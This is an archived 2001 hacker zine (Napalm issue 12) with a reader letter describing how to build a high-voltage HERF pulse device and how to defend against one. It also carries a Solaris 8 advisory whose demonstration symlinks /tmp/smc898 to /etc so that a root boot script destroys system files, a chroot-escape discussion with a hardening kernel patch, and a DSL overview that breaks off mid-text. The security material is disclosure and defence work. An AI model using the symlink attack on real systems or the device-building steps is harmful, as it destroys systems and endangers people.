what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

napalm-12.txt

napalm-12.txt
Posted Oct 25, 2001
Authored by napalm, Kynik | Site napalm.firest0rm.org

Napalm Magazine issue #12 - In this issue: Local DoS in Solaris 8, Why chroot(2) sucks (includes a linux kernel patch to secure it), DSL and Ma Bell, BBS list, and more.

tags | kernel, local, magazine
systems | linux, solaris
SHA-256 | 107c7da450c3849f79a2f560b027fb9cc0cd37652190823870b8d6ca57dcbf04

napalm-12.txt

Change Mirror Download
           /\  /^/_ _ __  __ _|^|_ __ ___
/ \/ / _` '_ \/ _` | | '_ ` _ \
/ /\ / (_| |_) (_| | | | | | | |
/ / \/ \__, .__/\__,_|_|_| |_| |_|
|_|

. . . ..n12: 2001.10.15
---------------------------------------------------------------------------
all content copyright © 2001 by the individual authors. all rights reserved
---------------------------------------------------------------------------

. . . .....................................................................
0x00 Editor's Comments
0x01 URLs
0x02 Mailbag
0x03 BBS List
0x04 Local DoS in Solaris 8
0x05 Why chroot(2) Sucks
0x06 DSL and Ma Bell
0x07 Music Reviews
0x08 Credits
..................................................................... . . .

________________________________
------------------------- - ajax
[=] 0x00: Editor's Comments

Hi kids. Remember Napalm? Issue 11 was a hella long time ago, and I was
unavailable for most of it, so kynik pretty much put it out by himself. I
felt bad and said I'd do n12. It's amazing how much other stuff your life
finds for you to do when you've got a zine to put out. Oh well. It could
be worse. It could be Phrack.

____________________________
------------ - _azure, kynik
[=] 0x01: URLs

Constitution Society (research and advocacy)
http://www.constitution.org/

Intelligence Forum
http://www.intelforum.org/

The AOL Protocol
http://www.aol-files.com/misc/theaolprotocol.wri

Telco Recordings
http://www.payphone-directory.org/sounds.html

The Intelligence Network
http://www.intellnet.org/

______________________
--------------- - ajax
[=] 0x02: Mailbag

Date: Tue, 25 Sep 2001 06:25:24 -0700 (PDT)
From: ali shafiy <tiger_110_ir@yahoo.com>
To: ajax@firest0rm.org
Subject: helpppppppppppp

hi
how are you
sorry can you help us?
we need booter program in yahoo mesenger ok?
please send to us ok|\
tiger_110_ir@yahoo.com
or
etehad_no@yahoo.com
we need your help sr.
thanx
sorry
byeeeeeeeeeeeeeeee

[ wow. i, er, um... wow. i wish i were making this up. the next one is
way better, i promise. {ajax} ]

[ Didn't everybody get this one? {Rsquared} ]

---

Date: Tue, 11 Sep 2001 17:34:22 +0530
From: "neelandan<oo7scs@yahoo.com>" <oo7scs@yahoo.com>
To: kynik@firest0rm.org
Subject: HERF and Tempest - why they are related

This is with reference to the article on HERF gun which appeared in
issue 3 of NAPALM. I would like to approach the construction of the
device from a different angle, to see if the same end can be achieved by
different means. (In other words, I would like to shove my two bits in.)

That article set me thinking on the problem of defence. Surprisingly,
the techniques are well known and recommended, though for other reasons.
EMP hardening (TEMPEST) is desirable, necessary, and should be considered
an essential part of securing any computing device which handles sensitive
information.

Standard Disclaimer -
If you try to construct the device described in this article, you are
likely to be found dead on the roof with a dish antenna, a television
set and some bizarre equipment. Everyone will assume you were trying to
rig up some new crazy satellite receiver - and then they will find the
hard copy of this article near you. WE ARE NOT RESPONSIBLE FOR ANYTHING!
The description refers to a hypothetical device, against which defences
are discussed.

[ Let me reiterate for the author: you are likely to make yourself
sterile, blind, burned, dead, or all of the above. {kynik} ]

***

The aim of the device to be described is to induce high voltage
breakdown and subsequent destruction in semiconductor devices in the
target area. An estimate is made of the energy necessary to cause such
destruction and the equipment necessary to produce the necessary HERF beam
shall be described. Finally the defences against such an attack shall be
discussed.

***

We shall target LSI Digital Circuits commonly found inside computing
machines. The supply voltage of such devices is usually 5V. Destructive
breakdown of the MOS structure inside can be guaranteed to occur at an
over-voltage of five to ten times, a minimum of 25 to 50 V. ESD
protection on the inputs enable it to withstand normal handling. The RF
energy needed to overwhelm the input protection can be assessed from
published data on chip protection by the manufacturers. Taking the trace
length inside the target chip to be 5mm, we need an induced electric field
of around 5 to 10 V/mm which translates to an electric field strength of
ten thousand volts per meter.

***

Construction - HE RF PULSE CANNON

Theory

As Mr. Maxwell so accurately observed long ago, an oscillating electric
charge results in a radiated electromagnetic wave. For a pulse, a large
electric charge has to be made to jump. The amplitude of the pulse will
be proportional to the magnitude of the charge and the speed of the jump.

Parts of the System

1. 25KV Power Supply
2. Voltage Multiplier
3. 1MV Switch
4. Antenna

We shall look at each of these separately. They are all commonly
available, or easily improvised, as shall be demonstrated.

1. 25KV Power Supply
Any good colour TV set has a power supply inside it which is capable of
sourcing about a milliampere at 25 Kilovolts. It is easier to use, and
explain away the reason for possession of, such a readily available source
rather than rig up your own. If you need a compact device, and you know
how to do it, just take a junked TV set and extract the EHT section.
So - you take your TV, and open it up. Inside, you will find a thick
cable clipped to the belly of the picture tube - that is the EHT cable.
Lift the round rubber guard round the connection and you will be able to
see the clip securing the connection. Pry it off with a screwdriver.
Attach an insulated cable to that clip and there you have it - 25KV.

2. Voltage Multiplier
For a decent output from our device, we need a decently high voltage.
Say 1 million volts - nice, round figure. We need to multiply the output
of the TV by about 40 times.
We take 40 capacitors, charge them all to 25KV in parallel and discharge
them in series. That would give us 1MV. To allow for losses in the
multiplier, it would be better to take 50 caps.
The capacitors need to be capable of withstanding 25KV for an indefinite
time - say 30 minutes. Beer bottles, salt water and aluminium foil would
be fine for a few stages. For 50 stages it would be better to use square
glass plates interleaved with aluminium foil and immersed in oil.
For charging the capacitors in parallel, high value resistors are
connected as shown in the diagram. These resistors each need to withstand
50KV - you might try wide strips of newspaper as the resistive element.

in+o-----/\/\/\----/\/\/\/\----/\/\/\/\-----/\/\/\/\----/\/\/\/\----O out+
| | | | | |
|---- |---- |---- |---- |---- |
| | | | | | | | | | |
=== o === o === o === o === o ===
| /o | o | o | o | o |
| | | | | | | | | | | |
| | ------| -----| -------| -------| ------|
| trig | | | | |
in-o-------/\/\/\----/\/\/\/\----/\/\/\/\-----/\/\/\/\----/\/\/\/\-
|
L-------------------------------------------------------------O out-

We need 50 switches each capable of switching 25KV - not something to be
found in every hardware store. However, we can make use of spark gaps to
perform the switching. The gaps are adjusted until they just do not break
down at 25KV. Then a spark induced at the first gap by an auxiliary
electrode (or just move it!) will cause a cascade of sparks and 1MV
appears at the output. An automotive ignition coil and battery may be used
as the trigger source. Or a relay may be rigged with an extension to its
armature to move the two electrodes closer together.

More information on suitable capacitors, spark gaps and construction
techniques are easy to find - just search the web for "tesla coil".

3. 1MV Switch
We need a switch which will hold its 'off' state up to 1MV, and then in
the space of a few nanoseconds switch on and hold its on state for a few
hundred nanosec. An oil quenched spark gap seems to be indicated. You need
a suitable oil in order to have the minimum dimensions.
The ideal device, if you can get it, is the vacuum interrupter. This
consists of two contacts which make and break in vacuum.
The 1MV switch forms part of the radiator and so it has to have low
inductance, which indicates a device of the smallest dimensions. It is
integrated into the wideband radiator assembly at the focus of a parabolic
reflector.
Small size is essential for the efficiency of the next part in the
chain, which is...

4. The Antenna
A radiating element and a reflector assembly to concentrate the energy
together make up the antenna. This is a transmitting antenna, and as such
its size does not, to a first approximation, affect the efficiency.

**

Now here is a short detour:
A larger area results in a proportionally larger signal output in the
case of a receiving antenna. It has to physically intercept the radiated
energy in order to convert it to RF currents in the feeder.

In the case of the transmitting antenna, all the energy supplied to it
minus that used to heat it up gets radiated. So provided the losses can
be minimised, there is no reason for the transmitting antenna to be made
as large as the receiving one.

The antenna is a device for matching the impedance of free space (377
ohms) to the impedance of the feeder. The theory and designs can be
found in many textbooks. What we need is a narrow beamwidth and a
minimum of loss.
Back on the highway:

**

A wide band radiating dipole is connected with the switch at the centre,
separating the two halves. The radiating elements are charged up to 1MV
and then the switch is closed. The stored energy in the antenna elements
get launched into space as an electromagnetic pulse.

The energy being launched into the ether is the energy in the antenna.
So the radiating element must have a high capacitance, low inductance and
must be resonant at as high frequency as possible.

It does not pay to have energy stored in a capacitor away from the
antenna. It would not have any effect on the amplitude of the pulses.
But the effect would be to prolong the duration of the discharge by
producing a long train of pulses with exponentially decaying amplitude.
The succeeding smaller pulses would not be of help in causing damage but
would possibly attract the attention of the authorities which may result
in confiscation of equipment, a spell in the cooler, and lack of net
access (NAPALM!) for the prescribed period.

-----------< cut here >------------

Now, let us suppose that that snotty kid across the block, too, is a
NAPALM fan and he is seen with a TV set, parabolic antenna, newspaper
strips and glass plates. Obviously, after having tried to hack into your
computer unsuccessfully he is trying to trash it forever. The question is:
What defences can you take?

(Scale it up:)
The prez of Lilliput has allocated umpteen haptillion bafotts to develop
the ultimate weapon to neutralise the enemy's defences. One shot and all
the big-endian computers of Blefuscu will be wiped out. Even that dumb
general Flestrin's hearing aid will cease to work and then his army and
navy will become sitting ducks. Little endianism will become the world
standard. Shouldn't the King of Blefuscu pull up his trousers? Shouldn't
Brobdingnag send its Carrier to the area to ensure peace?

(Scale it down:)
"There is Plenty of Room at the Bottom" - Richard. P. Feynman

Megahard dumbShoot ships in a packet which also contains small grains
of sand. HEY! On closer examination, they are microchips with integral
power supply and antenna. They have been programmed to fire whenever the
emissions of a computer running a rival's operating system is detected.
Eventually, all those "other" OSes will gain notoriety for instability, for
causing inexplicable computer crashes, and Megahard cashes in. Can
somebody manufacture a small device which could be sneaked into your
computer and which could disrupt its operation, randomly or on
command?

(Thunder, By Thor!)
There, (meow) the cat is out. It so happens that in nature there is the
neatest natural equivalent of the HERF device in lightning. The voltage is
far higher than any TV set and the current is large enough to melt thick
copper lightning conductors. Our equipment has been exposed to it from
birth, so as to speak, and the survival has been observed to vary from
complete destruction to relative immunity. Relative, because solid-state
devices can't withstand a direct lightning strike (as far as I know).

[ Probably not. At high voltages with just about all semiconductors,
Ohm's Law breaks down, i.e., it melts or catches fire. {ajax} ]

Making your equipment capable of withstanding the effects of lightning
discharges should also make it withstand the efforts of the snotty kid
across the block.

Now what about the scaled up attack? It so happens that the atmosphere
is a relatively hostile medium to the propagation of a high powered HERF
pulse (Which is why the Star Wars program was to be put up in space). When
a certain electric field intensity is reached the air becomes conducting
and the larger part of the pulse is utilised in heating it up. The rest
of it gets scattered, and is of no threat to your computer.

The scaled down attack? It is possible for some such device to be
sneaked into your den (Free Mouse Pad!) but it should be easy to track
down and eliminate, at the present state of the technology. When somebody
makes 'em light enough to float through the air into the computer case,
Boy! do we have a problem! Hopefully then, the devices inside our computer
case would be so advanced as to ignore extraneous pulses. Or the computer
itself would be floating around the room. In several parts, and no case.
Consult Nostradomus for more information on what the future might hold.

[ "Ignoring extraneous pulses" is amazingly hard. Optical computers,
however, are both feasible, faster (photon through air has less
propagation delay than electron through copper), and don't suffer from
induced currents in the same way. It's a possibility. {ajax} ]

There are stringent guidelines in force on the amount of RF emitted by
any computing device. Abide by them. The reciprocity principle holds true
here - if your computer is emitting a lot of hash into the ether, it is
suceptible to whatever may come wafting in: Thor hefting his hammer. That
snotty kid firing up his device. Or a fleet of satellites out there in
space synching up their pulses focusing on your town.

It would be a nice idea to listen to a portable radio at work. If you
can't, because of the interference, then you are potentially vulnerable.
You need to ensure holes are plugged, leads screened and filtered, and
cables shielded and terminated. Go by the textbooks on EMI shielding and
suppression. The manufacturers are doing their bit, making their machines
emit less, but adding peripherals might also add EMI leaks.

[ Part of FCC regulations say that a device "may not cause harmful
interference." This is good. Also that a device "must accept any
interference received, including interference that may cause undesired
operation." No, really! Read the bottom of any electronic device. So
your PC is only obeying the law when it gets fried by a HERF pulse. I
think we can all agree this is a stupid regulation. {Rsquared} ]

Radio and TV tuner cards for computers put the facility for digitizing
a portion of the RF spectrum into everyone's reach. Select a suitable
frequency range, point an antenna at your computer, download programs off
the net and you have script kiddiez pawing through the data you hold
sacred in the depths of your hard drive. Unless, of course, you have taken
precautions against Thor, Snotty kid, Lilliput, Megahard and kiddiez.
Quite an impressive list, isn't it?

I've started with a HERF gun and ended with EMI shielding. But the
issues involved concern the security of information - and for once no
networks are involved. I strongly feel each one of us should be aware
of the risks consequent on emission of EMI and take the necessary actions
to minimise any hazards.

neelandan<oo7scs> INDIA

[ Rawk. Thanks much. I love unsolicited article contributions. {ajax} ]

[ Especially when they're relevant and good quality. {kynik} ]

_________________________
---------------- - _azure
[=] 0x03: BBS List

.------------------------------------------------------------------------.
| |
|---------------------------/ BBS List - 09/28/01 /----------------------|
`------------------------------------------------------------------------'
azure@gh0st.net ================================= http://azure.gh0st.net

+------------------------------------------------------------------------+
| BBS Name | Connect With | Number / Address |
+------------------------------------------------------------------------+
| Digital Decay | Modem | (741)871-2057 |
| | Telnet | dd.23.org |
| Firest0rm BBS | SSH | bbs.firest0rm.org |
| Glenside's Cup of CoCo | Modem | (847) 428-0436 |
| noname BBS | SSH | bbs.crimelabs.net |
| OSUNY U.K. | Telnet/SSH:7734 | osuny.co.uk |
| Sacrificial Lamb | SSH | english.gh0st.net |
| The Upper Deck | SSH | bbs.vistech.net |
+------------------------------------------------------------------------+

______________________________________
------------------------------ - echo8
[=] 0x04: Local DoS in Solaris 8

Summary
-------

The smcboot startup procedure in certain hardware releases of Solaris 8
contains a security hole which can lead to a local denial of service and
can leave the target system crippled.

Details
-------

Out of the box, one of the startup scripts that runs upon boot on the
affected Solaris releases is /etc/rc2.d/S90wbem. That script contains the
following block of code:

SMC_PORT=`getent services ftp | cut -d' ' -f1`
if [ -n "$SMC_PORT" ]; then
SMC_PORT=898
fi

later, the script calls smcboot:

if [ -n "$VIPER_HOME" ]; then
$VIPER_HOME/bin/smcboot
else

Apparently, smcboot uses /tmp/smc$SMC_PORT as the directory in which it
keeps its pid file and possibly other state-keeping information. This is
speculation, but is strengthened by the code in the rest of the startup
script, which references that directory in the context of shutting the
service down, and by the observable behavior of smcboot:

if [ -n "$VIPER_HOME" ]; then
if [ -f /tmp/smc$SMC_PORT/boot.pid ]; then
kill -TERM `cat /tmp/smc$SMC_PORT/boot.pid`
else
$VIPER_HOME/bin/smcserver -p $SMC_PORT stop
fi
...

In any event, the smcboot process runs as root, does not properly handle
the existence of /tmp/smc$SMC_PORT if it already exists, and apparently
removes files in its target directory. Thus, it can be forced to remove
arbitrary files under the right conditions. Because /tmp is world-writable
and cleared at boot time, an unprivileged user who symbolically links
/tmp/smc$SMC_PORT to an arbitrary directory early during the boot cycle
(before S90wbem runs) can severely damage the contents of that target
directory.

In order to execute this attack, the user would have to be able to
create the link between the time that the system boots (when /tmp is
cleared) and when S90wbem starts. As S90wbem runs after S72inetsvc and
S75cron, a narrow window exists in which a malicious user could log on to
the system (or during which a pre-submitted cron job could run) and
symbolically link /tmp/smc$SMC_PORT to a target directory. When S90wbem
runs, the non-directory contents of the target directory will be
destroyed.

The problem is made easier to exploit by anything which slows down the
boot process at the right spot (for example, if S75savecore has a large
coredump to write out). There are other conditions under which the hole
could be exploitable (eg. if smcboot is disabled by default, but a
sysadmin decides to manually start it).

I found almost no documentation whatsoever on WBEM or smcboot on
Sunsolve, both on the public and customer (restricted access) web sites. I
will assume from the name of the process that this is a component of the
Sun Management Console (blatant speculation on my part; if you know
better, please let me know). There is no man page for smcboot on my
systems.

Demonstration
-------------

// IF YOU FOLLOW THIS PROCEDURE EXACTLY, YOU WILL CRIPPLE YOUR SYSTEM.
// YOU HAVE BEEN WARNED!!!

// this assumes that smcboot is not running, for the sake of simplicity.

$ cd /tmp
$ id
uid=60001(nobody) gid=60001(nobody)
$ pwd
/tmp
$ ln -s /etc smc898
$ ls -alt smc898
lrwxrwxrwx 1 nobody nobody 4 Sep 1 11:54 smc898 -> /etc

// now, we'll manually run /etc/rc2.d/S90wbem, as root, as the boot
// process ordinarily would.

# id
uid=0(root) gid=1(other)
# /etc/rc2.d/S90wbem start
stat: No such file or directory
stat: No such file or directory
stat: No such file or directory
mkdir: File exists
...
#
INIT: Cannot stat /etc/inittab, errno: 2

// as a result of the attack, we've pretty much wiped out everything in
// /etc...

# ls /etc
TIMEZONE inetd.conf mnttab protocols services
aliases log netmasks rc2.d sock2path
hosts lp networks security
#
INIT: Cannot stat /etc/inittab, errno: 2
Sep 1 16:01:25 foo init[1]: open_pam_conf: stat(/etc/pam.conf) failed:
No such file or directory
Sep 1 16:01:25 foo init[1]: open_pam_conf: stat(/etc/pam.conf) failed:
No such file or directory

INIT: SINGLE USER MODE

INIT: execle of /etc/sulogin failed; errno = 2

ENTER RUN LEVEL (0-6, s or S) [3]:

// This system is now wrecked. Restoration of files from backup will be
// necessary to fix the damage we've caused.

Vulnerable Versions
-------------------

Vulnerable: Solaris 8, Hardware 4/01 and 1/01.

Not vulnerable: Solaris 8, original release, Hardware 10/00.

The version of smcboot that ships with Solaris 9 Beta (whatever) exhibits
the same insecure behavior, but as it writes its temporary files to
/var/run (which is not world-writeable), it doesn't seem vulnerable to
the attack described above.

Versions of Solaris prior to Solaris 8 are not vulnerable, as they don't
contain the product in question. The above hardware releases are the ONLY
ones I tested.

Workarounds
-----------

Disable /etc/rc2.d/S90wbem. This will (obviously) remove whatever
functionality the service provides.

Alternatively, the startup script could made to run earlier in the
Solaris startup process, so that it executes before inetd starts or the
cron service becomes available. NOTE: I have NOT tested this. I have no
idea whether or not smcboot depends on any of those earlier processes in
order to function properly.

Vendor Notification
-------------------

Sun was notified on 9/4/2001. They assigned a BugID (available upon
request) and were able to readily reproduce the problem. T-patches (beta)
have been produced to address the issue. They are T109134-24 for sparc and
T109135-24 for x86. They are available through your Sun rep. Production
patches are scheduled for release sometime around 10/1/2001. I have NOT
personally seen or tested any of the T-patches. I can't say with any
certainty that they actually fix the problem, or that they do so in an
optimal way.

Addendum
--------

On a more personal note, I wish to point out that Sun has handled this
issue in a much more professional manner than certain others with which
I've been involved. On the subject of past offenses, Sun has removed the
wording from Sunsolve which wrongly assigns credit for my discovery of a
hole in Veritas Volume Manager to Sun and Veritas (see Napalm 6 & 11).
The advisory now simply states that "a security hole has been discovered"
(it used to say "Veritas has discovered..."). I'm glad I don't do this for
the fame or for the chicks...

Copyright, 9/17/2001, echo8@gh0st.net.

__________________________________
--------------------------- - ajax
[=] 0x05: Why chroot(2) Sucks

- Intro

The chroot(2) system call in Unix allows you to change the root
directory of a process. This is often used as a security mechanism to
limit the damage a process can do to a machine by limiting its view of the
filesystem. This isn't quite ideal behavior. What you really want is a
system call that prevents a process from changing any part of the system
outside its jail [1], not just the filesystem. However, for many uses,
chroot(2) is good enough. It does raise the bar significantly, and limits
the scope of the damage that can be done.

- chroot(2) is broken

Or it would raise the bar, anyway, assuming most implementations weren't
fundamentally broken. There is a subtle loophole that lets you escape a
chroot, if you can get root privilege inside the chroot. This has been
covered in great detail in www.bpfh.net/simes/computing/chroot-break.html,
so I won't go into it in great length here. The basic trick is to chroot
again, while holding open a file descriptor that points to a directory
outside the new chroot; then, fchdir() to the open file descriptor,
repeatedly chdir("..") until you hit the real "/", and chroot("."). Oops.

Some implementations (FreeBSD, notably) try to prevent this by
forbidding you to chroot twice if you have any file descriptors open that
point to directories. That's nice, but it only fixes the most flagrant
abuses of chroot. In the rest of this paper, I will attempt to enumerate
what else a chroot'd process can do that it (arguably) should not, and
present a patch for Linux that attempts to fix the worst offenses. [2]
Note that since I'm making the patch for Linux, I'm going to focus on some
Linux-specific features in this article; the concepts are universal
though.

- chroot(2) and devices

mknod(2) lets you create a file in the file system that corresponds to a
device attached to the computer. Therefore, a root process in a chroot can
effectively see and modify data outside its chroot by simply accessing the
associated block device. The simple fix, of course, is to not let a
process inside a chroot call mknod(2).

- chroot(2) and UNIX sockets

Unix domain sockets allow you to pass open file descriptors between
communicating processes. This would allow a process inside a chroot to
modify a file outside its chroot. The simple fix is not to allow processes
to pass file descriptors if they have different root directories.

Unix domain sockets are not very tightly bound to the file system. When
you connect(2) to a socket, the name lookup is not a pathname lookup;
it's a simple string match against the path the socket was bound to (at
least in Linux, other Unixes may be different). Therefore, a process
within a chroot can connect to sockets outside its chroot by simply
passing the right name to connect(2). The fix for this involves turning
the connect routine for pf_unix sockets into a pathname lookup relative to
the root directory of the calling process. A chrooted process should be
allowed to connect to any socket it can see within its chroot (i.e., a
process chrooted to /chroot should be able to connect to a socket named
/chroot/tmp/socket that is opened by a process running with / as its root
directory).

Even if we don't allow Unix domain sockets to connect across chroot
boundaries, they may still exist (anonymous socketpairs shared between a
parent and chrooted child, for example). Given the previous rule about
socket visibility, chrooted processes may legimately connect to sockets
opened from outside the chroot. Therefore getpeername(2) needs to be made
chroot-aware, to return mangled pathnames to chrooted processes. This gets
more complicated when you realize that the peer (outside the chroot) may
have been the connect(2)ing side, and may be bound to a name outside the
chroot; the fix in Linux in this case is to simply return the abstract
name of the socket.

- chroot(2) and process operations

Signal delivery is only tied to credentials, not a root directory. A
process running within a chroot is logically in a subset of the full set
of running processes. It should therefore not be allowed to deliver
signals to processes running in a less-restricted chroot. The simple fix
is to simply not allow signal delivery from one process to another if the
two don't have the same root directory. The right fix is: when sending a
signal from a chrooted process, walk up the directory tree from the root
of the sender until you find the root of the receiver, and fail if not
found. If there are three processes, rooted at /chroot, /chroot/a, and
/chroot/b, then the first can send signals to the second two, but the
latter two can only send signals to themselves, which seems logical.
Alternatively one could slice up the PID space by root directory, but
that's sick and wrong.

ptrace(2) doesn't respect chroot boundaries; a process within a chroot
can attach to (and arbitrarily manipulate) a process outside the chroot.
This is bad. Again, this can be fixed with a pathname lookup similar to
the one above. It can also be fixed by lowering the appropriate
capability.

Several capabilities should get cleared on chroot, among them:
sys_chroot, dac_override, linux_immutable, net_admin, net_raw, sys_module,
sys_rawio, sys_ptrace, sys_admin, sys_boot, sys_nice, sys_resource,
sys_time, sys_tty_config, and mknod. Better yet this should be a
sysctl'able mask. The patch below does this (the above capabilities are in
the "most" set described in the patch).

The CLONE_PID flag to clone(2) shouldn't be allowed, ever, as it
confuses parts of the kernel that expect PIDs to be unique, but it should
definitely not be allowed within a chroot.

- chroot(2) and kernel operations

Module operations still work within a chroot. This is not good. The easy
fix is to simply not allow module operations within a chroot. The complex,
clever, interesting fix is to limit some modules so that they only take
effect in filesystem scopes equal or more restrictive than the one they
were loaded in, but this is nearly impossible to implement (on x86, it
would rely on running modules at something other than ring 0).

The /proc filesystem is problematic within a chroot. The question is
whether it should lie or simply fail, when the information being read
might leak information or create security holes. As of 2.4, Linux's procfs
seems to behave pretty reasonably. If you mount /proc within a chroot,
most of the dangerous stuff within /proc/[pid] stops working (directories
and symlinks). mem and exe fail, environ doesn't fail but probably should.
/proc/mounts doesn't lie, meaning an attacker can see what block devices
are in use on a system. You can still write to /proc within a chroot, and
that's probably not good, it lets you do nasty stuff like change the
module loader and PCI registers and so forth. /proc/net/unix shows
pathnames relative to /, which is potentially bad (see above). Mounting
procfs read-only does behave as expected, so that's probably a smart idea
for any chroot environment that needs it.

I have not played much with devfs and chroots. Probably, it presents the
same device tree to all mounted instances, and that's not right. It
definitely doesn't create unique unix98 ptys for different chroots, which
means a process within a chroot can manipulate the terminal of a process
outside the chroot if it has sufficient privileges. devfs should be
changed to present only the requested subsets of the device tree to each
instace, on the no-mknod theory. devfs within a chroot is probably a bad
idea, though.

Swap space added to the system before the creation of the chroot, or by
unchrooted processes, is probably fine. Ideally if a process within a
chroot adds a swap space to the system it should only be visible within
that chroot, but that's asking way too much of the VM layer. It's
probably best to just forbid swapon(2) and swapoff(2) from chrooted
processes.

It may be desirable to prevent chrooted processes from changing the
system clock. However it's also desirable to run xntpd within a chroot to
mitigate any possible security holes. There's no easy answer to this one,
although the capability masking mentioned above can help.

set{host,domain}name(2) would ideally be local to each chroot. Barring
that, they should fail when called from a chrooted process.

/dev/console is problematic within a chroot. On the one hand renegade
processes shouldn't be able to spam the console; on the other hand we want
logging to work. The right thing is probably to not create a /dev/console
in the chroot, use syslog for logging, and configure that properly.

[ Please note ajax's use of the word 'probably' in many places here and
above. Keep that in mind. I doubt he's putting it there for the heck
of it. I'd bet some of this is still theoretical. Or maybe his
self-confidence is just a bit low ;) {kynik} ]

On x86, iopl(2), ioperm(2), and modify_ldt(2) should probably not be
allowed from within a chroot. quotactl(2) and sysctl(2) probably should
not allow changes. pivot_root(2) should fail. nfsservctl(2) should
probably just fail. prctl(2) should not allow you to set the "dumpable"
flag. Processes within a chroot should probably not be allowed to have
lower nice values than the process that created the chroot.

Most of these fall under the sys_admin capability.

- Footnotes

[1] - Sorry, poor terminology. FreeBSD has a funky jail(2) system call
that enforces a few more restictions, namely restricting IP traffic
to a specific IP address. I'm not entirely convinced of its
usefulness, but there it is.

[2] - I would make a patch for *BSD, but it would be gross and ugly. It
would require adding a field to the per-process data, and then
checking it in multiple places, in true BSD tissue-of-hacks fashion.
The Linux patch below is much more elegant; it revokes quite a few
capabilities on chroot. Said capabilities are already checked on
entry into the problematic system calls, so the changes are
localized and easier to verify.

- Appendix

The following is a patch for Linux that drops a sysctl'able mask of
capabilities on chroot. The mask starts at 0 at bootup; suggested values
are presented in the patch. This fixes most of the major abuses outlined
here by refusing to allow even root to do some things.

[ The patch is available separately from the Napalm homepage, so you don't
have to cut and paste. {kynik} ]

This patch is against a clean 2.4.12 tree. It will probably not apply
cleanly to much earlier kernels, but it only patches two files, if you
can't figure it out by hand you shouldn't be using this. Cut between the
-='s. Patch like normal (cd /usr/src && patch -p0 < tight-chroot.patch).

-= tight-chroot.patch
diff -u linux/fs/open.c.orig linux/fs/open.c
--- linux/fs/open.c.orig Wed Oct 10 15:59:34 2001
+++ linux/fs/open.c Wed Oct 10 23:08:18 2001
@@ -399,6 +399,15 @@
return error;
}

+/*
+ * the set of capabilities to drop after a chroot. can be modified from
+ * /proc/sys/kernel/chroot_cap_mask. suggested settings:
+ * 267072002 (turns off most capabilities, see napalm12 article)
+ * 536870911 (turns off all capabilities)
+ * 2363392 (turns off sys_admin, net_admin and sys_chroot)
+ */
+kernel_cap_t chroot_cap_mask = 0;
+
asmlinkage long sys_chroot(const char * filename)
{
int error;
@@ -427,6 +436,12 @@

set_fs_root(current->fs, nd.mnt, nd.dentry);
set_fs_altroot();
+
+ /* drop permissions */
+ cap_lower(current->cap_effective, chroot_cap_mask);
+ cap_lower(current->cap_inheritable, chroot_cap_mask);
+ cap_lower(current->cap_permitted, chroot_cap_mask);
+
error = 0;
dput_and_out:
path_release(&nd);
diff -u linux/kernel/sysctl.c.orig linux/kernel/sysctl.c
--- linux/kernel/sysctl.c.orig Wed Oct 10 19:43:56 2001
+++ linux/kernel/sysctl.c Wed Oct 10 23:08:02 2001
@@ -49,6 +49,7 @@
extern int sysrq_enabled;
extern int core_uses_pid;
extern int cad_pid;
+extern kernel_cap_t chroot_cap_mask;

/* this is needed for the proc_dointvec_minmax for [fs_]overflow UID and GID */
static int maxolduid = 65535;
@@ -255,6 +256,8 @@
{KERN_S390_USER_DEBUG_LOGGING,"userprocess_debug",
&sysctl_userprocess_debug,sizeof(int),0644,NULL,&proc_dointvec},
#endif
+ {KERN_CHROOT_CAP_MASK, "chroot_cap_mask", &chroot_cap_mask,
+ sizeof(kernel_cap_t), 0644, NULL, &proc_dointvec},
{0}
};

diff -u linux/include/linux/sysctl.h.orig linux/include/linux/sysctl.h
--- linux/include/linux/sysctl.h.orig Wed Oct 10 23:17:19 2001
+++ linux/include/linux/sysctl.h Wed Oct 10 23:08:56 2001
@@ -123,6 +123,7 @@
KERN_CORE_USES_PID=52, /* int: use core or core.%pid */
KERN_TAINTED=53, /* int: various kernel tainted flags */
KERN_CADPID=54, /* int: PID of the process to notify on CAD */
+ KERN_CHROOT_CAP_MASK=55, /* int: capability mask on chroot */
};



-= EOF

-=:[ ajax@firest0rm.org (c) 2001. don't steal. thanks.

________________________________
----------------------- - _azure
[=] 0x06: DSL and Ma Bell

.------------------------------------------------------------------------.
| |
|-----------/ Coaxing the Camel Through the Eye of a Needle /------------|
| |
| Digital Loop Electronics Breathe New Life |
| Into the Copper Infrastructure |
| |
`------------------------------------------------------------------------'
azure@gh0st.net ================================= http://azure.gh0st.net


In the mad dash for every company capable of stringing cable,
transmitting RF, or subletting service from someone who can to deliver
broadband to the last mile; the Regional Bell Operating Companies (RBOCs)
are finally being forced to drag their 19th century technology into the
digital age.

Sort of.

A recent article in _2600 Magazine: The Hacker Quarterly_ touched on
some of the underlying shifts in how modern telephone service is
provisioned and constructed by the Baby Bells, but failed to go into any
detail in regards to what shape these changes have taken. This article is
intended to be an informative overview of the "new paradigm" represented
by the massive roll-out of DSL capable lines by one of the remnants of
North America's favorite telecommunications monopoly.

Contrary to some reports, things are shifting around underneath Ma
Bell's skirt. The stimuli that has her all hot and bothered is (of
course) broadband, and Digital Subscriber Line (DSL) in particular.


_/ The Long Road to the Last Mile

The strange part is, data traveling to and from your DSL router will
still traverse the much coveted 'last mile' over copper. It's in how
they get up *to* that last mile that represents the true revolution for
traditional telco provisioning.

The arbiter of this revolution is called Digital Loop Electronics
(DLE). DLE is part of an initiative to develop a Next Generation Digital
Loop Carrier (NGDLC). DLE can support many different services, such as
POTS, ISDN, DS1, etc. simultaneously; while also providing capabilities
for DSL line sharing and new digital technologies yet to be rolled out.
This versatility is ideal in the competitive broadband environment the
RBOCs find themselves in. Instead of maintaining numerous different cable
and terminal technologies; DLE allows for a single standard of
distribution which can support virtually any service already offered (and
many more which are headed down the pipeline).

Traditionally, a telephone line has traversed a single, physical path
between the Central Office (CO) and the subscriber. The diagram below
illustrates a typical pre-DLE route between CO and customer via plain Pair
Gain (PG) cable; which bundles several lines together and terminates in a
Remote Terminal (RT) that in turn feeds copper to a neighborhood Serving
Terminal.


Pre-DLE Environment


Sub. ----------------- Sub.
|
Sub. --------|-------- Sub.
|
|
(PG cable) |
COT ------------ RT ------- X-Box ----- Serving
(F1) (F2) Terminal


This setup works pretty well. For voice traffic.

But the nature of DSL requires that subscribers be located within
twelve thousand feet of the CO which will be connecting their service.
Obviously, this requirement severely limits the number of customers a
telco can sell DSL service to. The telcos are solving this problem by
extending the CO into the field via fiber optics. This hack allows any
customer within two miles of an RT (which itself may be located several
